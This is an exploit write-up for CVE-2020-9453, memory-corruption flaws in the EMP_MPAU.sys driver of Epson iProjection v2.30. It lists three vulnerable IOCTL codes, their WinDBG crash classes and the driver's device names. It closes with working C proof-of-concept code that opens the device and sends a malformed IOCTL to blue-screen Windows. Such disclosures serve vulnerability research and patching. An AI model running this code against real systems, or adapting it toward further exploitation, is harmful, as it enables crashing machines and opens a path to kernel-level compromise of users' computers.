Epson iProjection - EMP_MPAU.sys (CVE-2020-9453)
POC exploits for various vulnerabilities found in the EMP_MAU.sys driver associated with Epson's iProjection software
# Exploit Title: Epson iProjection v2.30 Driver EMP_MPAU.sys Memory Corruption
# Date: 02/15/2020
# Exploit Author: FULLSHADE
# Vendor Homepage: https://epson.com
# Software Link: https://www.epson.eu/epson-projector-software
# Version: v.2.30
# Tested on: Windows 7 / Windows 10
# CVE : CVE-2020-9453
EMP_MPAU.sys
Within the EMP_MPAU.sys driver provided from Epson iProjection v2.30, there are three vulnerabilities via IOCTLs found in the sub_1300C function.
Address | IOCTL Code | Device | Function | Method | Access
0x1303B | 0x9C402402 | <UNKNOWN> 0x9C40 | 0x900 | METHOD_OUT_DIRECT 2 | FILE_ANY_ACCESS (0)
0x13047 | 0x9C402406 | <UNKNOWN> 0x9C40 | 0x901 | METHOD_OUT_DIRECT 2 | FILE_ANY_ACCESS (0)
0x1304F | 0x9C40240A | <UNKNOWN> 0x9C40 | 0x902 | METHOD_OUT_DIRECT 2 | FILE_ANY_ACCESS (0)
IOCTL crash classes :
| IOCTL | WinDBG BUGCHECK_STR | DEFAULT_BUCKET_ID | POC POC RESULT |
|---|---|---|---|
| 0x9C402402 | ACCESS_VIOLATION | NULL_CLASS_PTR_DEREFERENCE | BSOD |
| 0x9C402406 | ACCESS_VIOLATION | CODE_CORRUPTION | BSOD |
| 0x9C40240A | ACCESS_VIOLATION | CODE_CORRUPTION | BSOD |
Device names:
- \Device\EMPMPAUIO
- \DosDevices\EMPMPAU
BSOD crash POC outline skeleton code
#include <stdio.h>
#include <tchar.h>
#include <windows.h>
int _tmain(int argc, _TCHAR* argv[])
{
HANDLE m_handle = 0;
DWORD nbBytes = 0;
m_handle = CreateFileA("\\\\.\\EMPMPAU", GENERIC_READ | GENERIC_WRITE, 0, 0, OPEN_EXISTING, FILE_ATTRIBUTE_NORMAL, 0);
DeviceIoControl(m_handle, 0x9C402406, (LPVOID)0, 0x0, (LPVOID)0, 0x0, &nbBytes, NULL);
return 0;
}
